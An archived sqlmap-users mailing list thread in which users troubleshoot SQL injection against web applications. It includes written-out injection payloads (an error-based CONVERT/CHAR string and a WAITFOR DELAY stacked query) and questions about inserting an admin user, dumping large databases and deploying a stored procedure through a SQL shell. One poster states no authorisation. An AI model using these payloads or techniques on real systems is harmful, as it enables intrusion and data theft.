more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Vojtěch P. <kr...@gm...> - 2015-02-09 16:13:34
|
Hi, thanks for your reply. What do you mean by one working union payload? Do you mean payload which causes sqlmap to report URL as being union injectable? Thank you very much, Vojta On 9.2.2015 13:23, Miroslav Stampar wrote: > As Brandon said, one of columns could be "picky" about the "test" > values being used. We use either NULLs or integer values (e.g. 1) and > this works quite well in majority of situations (auto-casting and stuff). > > Also, there is a possibility that ORDER BY mechanism is triggering > some results, while the UNION query is not possible to achieve. I > would suggest you to find one working UNION payload and report back. > > Bye > > On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry > <bpe...@gm... <mailto:bpe...@gm...>> wrote: > > The application could be requiring one of the columns to be in a > certain format (perhaps a date, or serialized object) in order to > be brought to the UI. Just sending and int/string or a NULL causes > the SQL query to succeed, but the app throws an error due to the > data not being formatted as expected. > > On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm... > <mailto:kr...@gm...>> wrote: > > Greetings, > I am doing some pentesting for a corporation. > I am testing some GET parameter of their web application and I > encounter > a strange issue. > The URL seems to be injectable as sqlmap states, but at the > end it says > that it is not injectable. > Here is a link to the log with verbosity level 3. Due to > confidentiality > reasons, I can't provide you with actual requests or responses. > http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae > What might be the problem? > I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch > repository of > Arch Linux. > Thank you very much for your opinions, > Vojta > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel > Website, > sponsored by Intel and developed in partnership with Slashdot > Media, is your > hub for all things parallel software development, from weekly > thought > leadership blogs to news, videos, case studies, tutorials and > more. Take a > look and join the conversation now. > http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot > Media, is your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and > more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:23:22
|
As Brandon said, one of columns could be "picky" about the "test" values being used. We use either NULLs or integer values (e.g. 1) and this works quite well in majority of situations (auto-casting and stuff). Also, there is a possibility that ORDER BY mechanism is triggering some results, while the UNION query is not possible to achieve. I would suggest you to find one working UNION payload and report back. Bye On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> wrote: > The application could be requiring one of the columns to be in a certain > format (perhaps a date, or serialized object) in order to be brought to the > UI. Just sending and int/string or a NULL causes the SQL query to succeed, > but the app throws an error due to the data not being formatted as expected. > > On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote: > >> Greetings, >> I am doing some pentesting for a corporation. >> I am testing some GET parameter of their web application and I encounter >> a strange issue. >> The URL seems to be injectable as sqlmap states, but at the end it says >> that it is not injectable. >> Here is a link to the log with verbosity level 3. Due to confidentiality >> reasons, I can't provide you with actual requests or responses. >> >> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae >> What might be the problem? >> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of >> Arch Linux. >> Thank you very much for your opinions, >> Vojta >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:19:59
|
Really not sure what are you trying to do. Do you want that "error-based" query to be part of "stacked-query" or what? Bye On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote: > Maybe my question isn't clear , let me try again : > > I need to change stack query to not using timebase detection ? > > > Sqlmap detect injection there by error base type too, like this : > > > Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT > CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN > (9622=9622) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV > > How can i have this payload with type of stack query > > Regards > > On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote: > >> Guys is there any chance ? >> >> Thanks in advance >> >> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote: >> >>> I mean how may i have custom payload : >>> >>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT >>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN >>> (9622=9622) THEN CHAR(49) ELSE CHAR(48) >>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV >>> >>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: >>> >>>> Hi >>>> >>>> sqlmap gave me shell with injection type of stack queries ,but >>>> Payload is like this : >>>> >>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >>>> >>>> When i want insert with admin user sqlmap returns NULL and fails , >>>> Only says this before trying : >>>> >>>> [WARNING] time-based comparison requires larger statistical model, >>>> please wait.............................. >>>> >>>> Maybe i should change Payload , with what switch i can change payload ? >>>> >>>> >>>> Regards >>>> >>> >>> >> > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: a d. <deh...@gm...> - 2015-02-08 23:24:37
|
Maybe my question isn't clear , let me try again : I need to change stack query to not using timebase detection ? Sqlmap detect injection there by error base type too, like this : Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV How can i have this payload with type of stack query Regards On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote: > Guys is there any chance ? > > Thanks in advance > > On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote: > >> I mean how may i have custom payload : >> >> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT >> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN >> (9622=9622) THEN CHAR(49) ELSE CHAR(48) >> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV >> >> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: >> >>> Hi >>> >>> sqlmap gave me shell with injection type of stack queries ,but >>> Payload is like this : >>> >>> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >>> >>> When i want insert with admin user sqlmap returns NULL and fails , >>> Only says this before trying : >>> >>> [WARNING] time-based comparison requires larger statistical model, >>> please wait.............................. >>> >>> Maybe i should change Payload , with what switch i can change payload ? >>> >>> >>> Regards >>> >> >> > |
|
From: a d. <deh...@gm...> - 2015-02-08 23:12:26
|
Guys is there any chance ? Thanks in advance On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote: > I mean how may i have custom payload : > > Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT > CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN > (9622=9622) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV > > On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: > >> Hi >> >> sqlmap gave me shell with injection type of stack queries ,but >> Payload is like this : >> >> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >> >> When i want insert with admin user sqlmap returns NULL and fails , >> Only says this before trying : >> >> [WARNING] time-based comparison requires larger statistical model, please >> wait.............................. >> >> Maybe i should change Payload , with what switch i can change payload ? >> >> >> Regards >> > > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-08 23:08:12
|
The application could be requiring one of the columns to be in a certain format (perhaps a date, or serialized object) in order to be brought to the UI. Just sending and int/string or a NULL causes the SQL query to succeed, but the app throws an error due to the data not being formatted as expected. On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> wrote: > Greetings, > I am doing some pentesting for a corporation. > I am testing some GET parameter of their web application and I encounter > a strange issue. > The URL seems to be injectable as sqlmap states, but at the end it says > that it is not injectable. > Here is a link to the log with verbosity level 3. Due to confidentiality > reasons, I can't provide you with actual requests or responses. > > http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae > What might be the problem? > I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of > Arch Linux. > Thank you very much for your opinions, > Vojta > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Vojtěch P. <kr...@gm...> - 2015-02-08 22:08:42
|
Greetings, I am doing some pentesting for a corporation. I am testing some GET parameter of their web application and I encounter a strange issue. The URL seems to be injectable as sqlmap states, but at the end it says that it is not injectable. Here is a link to the log with verbosity level 3. Due to confidentiality reasons, I can't provide you with actual requests or responses. http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae What might be the problem? I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of Arch Linux. Thank you very much for your opinions, Vojta |
|
From: a d. <deh...@gm...> - 2015-02-05 16:01:15
|
I mean how may i have custom payload : Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9622=9622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: > Hi > > sqlmap gave me shell with injection type of stack queries ,but > Payload is like this : > > id=6&rid=1'; WAITFOR DELAY '0:0:5'-- > > When i want insert with admin user sqlmap returns NULL and fails , > Only says this before trying : > > [WARNING] time-based comparison requires larger statistical model, please > wait.............................. > > Maybe i should change Payload , with what switch i can change payload ? > > > Regards > |
|
From: a d. <deh...@gm...> - 2015-02-05 13:12:32
|
Hi sqlmap gave me shell with injection type of stack queries ,but Payload is like this : id=6&rid=1'; WAITFOR DELAY '0:0:5'-- When i want insert with admin user sqlmap returns NULL and fails , Only says this before trying : [WARNING] time-based comparison requires larger statistical model, please wait.............................. Maybe i should change Payload , with what switch i can change payload ? Regards |
|
From: Brandon P. <bpe...@gm...> - 2015-02-04 20:34:22
|
Only if you aren't using a time based payload Sent from a phone > On Feb 4, 2015, at 14:25, a dehqan <deh...@gm...> wrote: > > Hi > > Can we use Thread witch while dumping database ? > > I mean it an be the only way to have faster dump ? > > Regards > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: a d. <deh...@gm...> - 2015-02-04 20:25:50
|
Hi Can we use Thread witch while dumping database ? I mean it an be the only way to have faster dump ? Regards |
|
From: a d. <deh...@gm...> - 2015-02-04 15:59:20
|
how may i deploy this sp with sql shell ? http://pastebin.com/NtDWccp0 On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote: > this searchs in one table , How to say sql search in all tables (except > writting all tables one by one ) > > On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> > wrote: > >> You would be better off finding the most likely column to contain that >> value, then select from table where column = 'value' >> >> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote: >> >>> Yes i think it's the way , >>> How may i search based on column value in all tables all columns ? >>> >>> >>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: >>> >>>> try --sql-shell >>>> >>>> 2015-02-04 >>>> ------------------------------ >>>> is2reg >>>> ------------------------------ >>>> *发件人:*a dehqan <deh...@gm...> >>>> *发送时间:*2015-02-04 23:20 >>>> *主题:*Re: [sqlmap-users] Search based on fileds value >>>> *收件人:*"Brandon Perry"<bpe...@gm...> >>>> *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< >>>> ra...@te...> >>>> >>>> Thanks >>>> >>>> You mean first dump all databases and then search in files ? >>>> if yes i need a way without dumping all databases because database is >>>> huge ofcourse about 40 databases . >>>> >>>> And may i use --thread or any other option to make it faster ? >>>> >>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry < >>>> bpe...@gm...> wrote: >>>> >>>>> --dump then grep? >>>>> >>>>> >>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >>>>> >>>>>> Hi >>>>>> >>>>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>>>> >>>>>> for exmample how to search in all databases for column with value of >>>>>> 1232434345 ? >>>>>> >>>>>> >>>>>> Regards >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>>> is your >>>>>> hub for all things parallel software development, from weekly thought >>>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>>> Take a >>>>>> look and join the conversation now. >>>>>> http://goparallel.sourceforge.net/ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>> >>>>> >>>>> -- >>>>> http://volatile-minds.blogspot.com -- blog >>>>> http://www.volatileminds.net -- website >>>>> >>>> >>>> >>> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > |
48 messages has been excluded from this view by a project administrator.
